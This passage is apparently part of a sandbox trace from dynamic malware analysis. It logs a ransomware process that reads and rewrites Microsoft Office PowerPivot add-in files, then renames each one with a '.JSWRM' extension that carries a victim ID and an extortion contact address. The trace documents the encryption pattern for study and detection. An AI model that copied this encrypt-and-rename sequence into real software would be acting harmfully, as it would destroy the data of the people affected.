lpDistanceToMoveHigh=0x0) returned 0x0 [0128.051] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0128.058] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.058] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0128.059] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1069\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1069\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1069\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1069\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.075] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.075] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.076] CloseHandle (hObject=0x338) returned 1 [0128.077] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.077] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0128.086] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.086] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0128.087] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1081\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1081\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1081\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1081\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.089] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.089] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.091] CloseHandle (hObject=0x338) returned 1 [0128.091] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.091] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0128.097] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.097] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0128.098] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1086\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1086\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1086\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1086\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.101] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.101] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.103] CloseHandle (hObject=0x338) returned 1 [0128.103] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.103] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11c60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11c60, lpOverlapped=0x0) returned 1 [0128.109] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.109] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11c60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11c60, lpOverlapped=0x0) returned 1 [0128.110] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1087\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1087\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1087\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1087\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.112] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.112] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.114] CloseHandle (hObject=0x338) returned 1 [0128.114] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.114] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0128.125] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.125] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0128.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1110\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1110\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\1110\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\1110\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.129] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.129] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.130] CloseHandle (hObject=0x338) returned 1 [0128.130] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.130] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x10a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x10a60, lpOverlapped=0x0) returned 1 [0128.136] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.136] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x10a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x10a60, lpOverlapped=0x0) returned 1 [0128.138] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2052\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2052\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2052\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2052\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.141] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.141] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.142] CloseHandle (hObject=0x338) returned 1 [0128.142] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.142] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0128.149] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.149] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0128.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2070\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2070\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2070\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2070\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.152] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.152] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.153] CloseHandle (hObject=0x338) returned 1 [0128.154] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.154] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x112c0, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x112c0, lpOverlapped=0x0) returned 1 [0128.176] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.177] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x112c0, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x112c0, lpOverlapped=0x0) returned 1 [0128.178] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2074\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2074\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\2074\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\2074\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.181] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.181] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.182] CloseHandle (hObject=0x338) returned 1 [0128.182] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.182] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11a60, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11a60, lpOverlapped=0x0) returned 1 [0128.189] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.189] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11a60, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11a60, lpOverlapped=0x0) returned 1 [0128.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\3082\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\3082\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\3082\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\3082\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.193] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.193] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0128.195] CloseHandle (hObject=0x338) returned 1 [0128.195] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.195] ReadFile (in: hFile=0x264, lpBuffer=0x27b348, nNumberOfBytesToRead=0x11860, lpNumberOfBytesRead=0x345de64, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345de64*=0x11860, lpOverlapped=0x0) returned 1 [0128.203] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.203] WriteFile (in: hFile=0x264, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x11860, lpNumberOfBytesWritten=0x345de60, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345de60*=0x11860, lpOverlapped=0x0) returned 1 [0128.204] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\9242\\PowerPivotExcelClientAddIn.rll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\9242\\powerpivotexcelclientaddin.rll"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\Resources\\9242\\PowerPivotExcelClientAddIn.rll.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\resources\\9242\\powerpivotexcelclientaddin.rll.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.207] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.207] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.289] CloseHandle (hObject=0x314) returned 1 [0128.290] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.290] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x1100, lpOverlapped=0x0) returned 1 [0128.292] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.292] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x1100, lpOverlapped=0x0) returned 1 [0128.293] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ro\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ro\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ro\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ro\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.296] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.296] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.298] CloseHandle (hObject=0x314) returned 1 [0128.299] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.299] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x15e0, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x15e0, lpOverlapped=0x0) returned 1 [0128.301] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.301] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x15e0, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x15e0, lpOverlapped=0x0) returned 1 [0128.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ru\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ru\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\ru\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\ru\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.304] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.304] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.306] CloseHandle (hObject=0x314) returned 1 [0128.306] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.306] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1150, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x1150, lpOverlapped=0x0) returned 1 [0128.308] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.308] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1150, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e1c8*=0x1150, lpOverlapped=0x0) returned 1 [0128.308] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sk\\LocalizedStrings.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sk\\localizedstrings.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\PowerPivot Excel Add-in\\sk\\LocalizedStrings.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\powerpivot excel add-in\\sk\\localizedstrings.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0128.311] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.311] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0128.312] CloseHandle (hObject=0x314) returned 1 [0128.313] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.313] ReadFile (in: hFile=0x338, lpBuffer=0x27b348, nNumberOfBytesToRead=0x1090, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e1cc*=0x1090, lpOverlapped=0x0) returned 1 [0128.315] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0128.315] WriteFile (in: hFile=0x338, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x1090, 